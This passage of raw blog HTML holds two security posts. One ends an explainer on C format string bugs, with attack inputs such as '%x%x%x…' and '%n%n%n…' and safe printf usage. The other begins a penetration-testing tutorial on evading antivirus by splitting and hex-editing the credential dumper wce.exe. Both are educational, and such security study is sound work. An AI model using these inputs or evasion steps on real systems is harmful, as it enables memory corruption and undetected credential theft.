<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 0.5pt; border-color: initial; border-left-width: 0.5pt; border-right-width: 0.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">_scwprintf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">_snscanf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">_tscanf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">_sntscanf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">_scprintf</td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 0.5pt; border-color: initial; border-left-width: 0.5pt; border-right-width: 0.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">_snwprintf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">_snwscanf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">_vstprint</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">_vsnwprintf</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">_vftprintf</td></tr>
</tbody></table>
</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
These preceding functions in the table enable to generate a string based on a format string and a variable number of arguments. Thus, a format string can be contemplated a blueprint holding the basic structure of the string and tokens that determines what kinds of variable data goes where, and how it should be formatted in the <em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Printf</em> function.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Second, we have also different format specifiers at our disposal, available for numerous types of arguments to de displayed via <em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Printf</em> function; each of them can also have additional modifiers and field-width definitions. Following table illustrates a few of them especially used for format string attacks as;</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Table 2: </span>Format Token</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin: 0px 0px 0px 5pt; padding: 0px; vertical-align: baseline;">
<table border="0" style="border-collapse: collapse; border-spacing: 0px; border: 0px; box-sizing: border-box; font-family: inherit; font-size: 14px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px 0px 1.4em; padding: 0px; vertical-align: baseline; width: 573px;"><colgroup style="box-sizing: border-box;"><col style="box-sizing: border-box; width: 96px;"></col><col style="box-sizing: border-box; width: 315px;"></col><col style="box-sizing: border-box; width: 205px;"></col></colgroup><tbody style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;" valign="top">
<tr style="background: rgb(141, 179, 226); border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border: 0.5pt solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Token</span></td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: solid solid solid none; border-top-width: 0.5pt; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">To be Displayed</span></td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: solid solid solid none; border-top-width: 0.5pt; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Argument Category</span></td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 0.5pt; border-color: initial; border-left-width: 0.5pt; border-right-width: 0.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">%X</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Value of argument in hex notation as an unsigned integer</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Unsigned Int, char/short</td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 0.5pt; border-color: initial; border-left-width: 0.5pt; border-right-width: 0.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">%D or %I</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Integer of value of an argument in decimal notation</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Int, char/short</td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 0.5pt; border-color: initial; border-left-width: 0.5pt; border-right-width: 0.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">%S</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Character string pointed by the argument</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Char *, char[]</td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 0.5pt; border-color: initial; border-left-width: 0.5pt; border-right-width: 0.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">%U</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Value of argument in decimal notation as an unsigned integer</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Unsigned Int, char/short</td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 0.5pt; border-color: initial; border-left-width: 0.5pt; border-right-width: 0.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">%P</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Value of pointer will printed in hex form notation</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">(Void *)</td></tr>
<tr style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><td style="border-bottom-width: 0.5pt; border-color: initial; border-left-width: 0.5pt; border-right-width: 0.5pt; border-style: none solid solid; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">%N</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">Nothing will be displayed</td><td style="border-bottom-width: 0.5pt; border-color: initial; border-right-width: 0.5pt; border-style: none solid solid none; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; line-height: inherit; margin: 0px; padding: 4px 7px; vertical-align: middle;">(Int *)</td></tr>
</tbody></table>
</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
If the program produces strange output while supplying the format-string input, then it may be deem to vulnerable for this attack. For instance, feeding a program with such malicious sequences of %x%x%x%x%x%x%x…, %n%n%n%n%n…%s%s%s%s%s…, may make it crash or output data from the stack.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">COUNTERMEASURE</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Once, the hacker successfully detects this loophole and subsequently exploits it. He can perform multiple vicious operations like, read memory from the target process using the %s specifier, write the number of characters output so far to an arbitrary address using the %n specifier, and modify the number of characters output so far using width modifiers.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
So, the rule of thumb in preventing format string bugs to be exploited by hackers is not to use a non-constant as a format string argument in all <em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Printf</em> family of functions. Instead, the correct usage of <em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Printf</em> without non-constant should be as following;</div>
<pre class="brush: plain; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title="">printf(user_supplied_data); // Prone to Vulnerable
printf("%s", user_supplied_data); // Correct Usage
fprintf(stderr, user_supplied_data); // Prone to Vulnerable
fprintf(stderr, "%s", user_supplied_data); // Correct Usage
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Besides, if circumstances truly demands that a format string include input read from outside the program, then it is suggested to perform rigorous input validation on any values read from outside the program that are included in the format string. Moreover, perform a regular checking via third party tools</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Like Flawfinder, RATS, and ITS4 in pursuit of this vulnerability.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">CONCLUSIONS</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Format string bug is the consequence of wrong programming practice, allowing externally supplied, un-sanitized data in the format string argument that results in exploitable format string vulnerabilities. In fact, this is an excellent paradigm of what can happen when functions used untrusted input to determine the layout the security. This editorial introduced this bug and explained the root cause behind the occurrence in context of C programming language code. It explained in deep, how to detect and walk through the details of how exactly this vulnerability works.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">REFERENCES</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
[1] <a href="https://www.owasp.org/index.php/Format_string_attack" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">https://www.owasp.org/index.php/Format_string_attack</a></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; color: #231f20; font-family: inherit; font-size: 9pt; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">[2] www.securityfocus.com/archive/1/66842</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; color: #231f20; font-family: inherit; font-size: 9pt; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">[3] Writing Secure Code, Second Edition</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; color: #231f20; font-family: inherit; font-size: 9pt; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">[4] www.securityfocus.com/archive/1/81565</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; color: #231f20; font-family: inherit; font-size: 9pt; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">[5] www.nextgenss.com/papers/win32format.doc</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
[6] Write It Secure: Format Strings and Locale Filtering”</div>
</div>
Anonymoushttp://www.blogger.com/profile/14161834164641471363noreply@blogger.com0tag:blogger.com,1999:blog-185877282583432766.post-14951466241056878452016-01-07T13:56:00.000+05:302016-01-07T13:56:45.811+05:30Evasion Tools to Bypass Antivirus Softwares<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.worldit.info/wp-content/uploads/2009/09/Lista-antivirusi.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.worldit.info/wp-content/uploads/2009/09/Lista-antivirusi.png" height="272" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Often during our penetration testing engagements, we may have to bypass antivirus applications – especially during the post exploitation phase to execute certain files on the target machines. Sometimes it is challenging to bypass certain antivirus applications, as there is no standard method/technique available to bypass all the antivirus software. Thus, we need to try out different methods to bypass them. This article walks the reader through some of the popular tools available to play with Antivirus evasion.</div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
File Splitters and Hex editors</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The first technique that we are going to discuss is using file splitting tools to identify the exact signature that is being detected by the antivirus application and modify it. This is one of the oldest ways to bypass AV tools. This technique is efficient if we can locate the exact signature that is being detected. However, there is a limitation with this technique. If we mess the functionality of the application, it becomes useless even if we bypass antivirus. So, as long as the functionality is not modified while we are changing the signatures, we are good to go.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
This can be achieved by using a file-splitting tool to split the binary into many parts. This splitting should be done in such a way that each part is larger than the previous one by a fixed amount. Then we need to run the Antivirus scan on these parts to identify which part is flagged first as malicious. We need to do this process repeatedly until the actual signature is located. Tools such as “Dsplit” and “Evade” can be used for file splitting. Once the signature is located, we need to modify it and save the modified binary.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Let’s have a look at an example of how this really works against Antivirus tools.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
I have downloaded wce.exe from the link given below. This is one of the commonly used tool during post exploitation for dumping passwords in clear text.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Link to download WCE: <a href="http://www.ampliasecurity.com/research/windows-credentials-editor/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://www.ampliasecurity.com/research/windows-credentials-editor/</a></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
When we scan this tool through virustotal.com, it is flagged as malicious by 47 Antivirus softwares out of 56.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100915_0003_AntivirusEv1.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
By using Dsplit, I have noticed that some antivirus software is detecting it as malicious using its welcome text, which is displayed when we run this tool. Therefore, I opened wce.exe in a hex editor and changed this signature from uppercase to lowercase and vice versa. This is shown below.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100915_0003_AntivirusEv2.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
After making the above shown modifications to the binary, I have scanned through virustotal.com once again and noticed that 42 antivirus engines out of 56 have flagged it as malicious this time.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100915_0003_AntivirusEv3.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
However, this didn’t bypass most of the antivirus applications; it is possible to do that if we can locate the exact signature that is being detected by those AVs.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
When we use the above-mentioned technique, we should not forget about the functionality of the binary while making changes.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
As an example, here is the output of original wce.exe dumping the password from memory.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100915_0003_AntivirusEv4.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; color: #44546a; font-family: inherit; font-size: 9pt; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Figure 1: output of the original wce.exe</em></span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The functionality remained the same even after making changes to the binary. It is still able to get the password from the memory as shown below.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
